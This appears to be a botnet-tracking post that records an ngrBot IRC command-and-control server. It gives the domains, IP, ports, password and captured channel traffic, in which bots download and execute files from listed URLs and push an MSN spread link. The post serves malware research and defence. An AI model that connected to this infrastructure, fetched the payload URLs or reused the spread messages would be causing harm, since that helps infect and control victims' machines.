up.scorevidic.net (botnet hosted in United States, Baltimore, Gandi US Inc)

* DNS resolving up.scorevidic.net

* DNS resolved up.scorevidic.net to 173.246.103.19

* DNS resolving av.psybnc.cz

* DNS resolved av.psybnc.cz to 173.246.103.19

* DNS resolving av.shannen.cc

* DNS resolved av.shannen.cc to 173.246.103.19

173.246.103.19 3211

173.246.103.19 4949

173.246.103.19 5900

Remote Host Port Number
173.246.103.19 4949 PASS ngrBot

194.28.44.217 80

213.251.170.52 80

216.45.58.150 80

70.38.98.239 80

95.64.10.203 80

PRIVMSG #t :[MSN]: Updated MSN spread message to “:| http://apps.facebook.com/xxx_photoo/index.php?=2525453”
PRIVMSG #new :[d=”http://www.sitepalace.com/gamil/lokiB.jpeg” s=”169985 bytes”] Update error: MD5 mismatch (271D4D0EBDC11F17B3E5E3D6416EE049 != 9798A05FD6A79E8A75F632742F922ACA)
PRIVMSG #new :[d=”http://p-file.su/data2/10193-1.exe” s=”142336 bytes”] Executed file “C:\Documents and Settings\UserName\Application Data\2.tmp” – Download retries: 0
PRIVMSG #r :[Ruskill]: Detected File: “C:\Documents and Settings\UserName\Application Data\2.tmp”
PRIVMSG #new :[d=”http://img105.herosh.com/2011/04/15/763089596.gif” s=”81408 bytes”] Executed file “C:\Documents and Settings\UserName\Application Data\3.tmp” – Download retries: 0
PRIVMSG #new :[d=”http://img105.herosh.com/2011/04/12/451140916.gif” s=”78336 bytes”] Executed file “C:\Documents and Settings\UserName\Application Data\8.tmp” – Download retries: 0
NICK n{US|XPa}onidexy
USER onidexy 0 0 :onidexy
JOIN ##RedEm-001## redem
JOIN #t
JOIN #new
PRIVMSG #t :[MSN]: Updated MSN spread interval to “4”

UPDATE:
USER gdetsuk 0 0 :gdetsuk
JOIN ##RedEm-001## redem
JOIN #t
JOIN #new
PRIVMSG #t :[MSN]: Updated MSN spread interval to “3”
PRIVMSG #t :[MSN]: Updated MSN spread message to “:| http://apps.facebook.com/xxx_photoo/index.php?=”
NICK VirUs-xszppj
PRIVMSG #t :[d=”https://rapidshare.com/files/457931204/SerMsvB.exe” s=”140800 bytes”] Updated bot file “C:\Documents and Settings\UserName\Application Data\Zcxaxz.exe” – Download retries: 0
PONG :TESTING1.VirUs.HERE
USER VirUs “” “omt” :
8Coded
8VirUs..
JOIN #MarCH# Testbro
PRIVMSG #MarCH# :Success.
NICK n{US|XPa}gdetsuk

UPDATE:
Remote Host Port Number
173.246.103.19 3211 PASS ngrBot

173.246.103.19 4949 PASS ngrBot

173.246.103.19 5900 PASS ngrBot

213.251.170.52 80

USER yynmtad 0 0 :yynmtad
NICK n{US|XPa}yynmtad
NICK n{US|XPa}bbriupa
USER bbriupa 0 0 :bbriupa
NICK n{US|XPa}vsenmgs
USER vsenmgs 0 0 :vsenmgs

Hosting information:
http://whois.domaintools.com/173.246.103.19
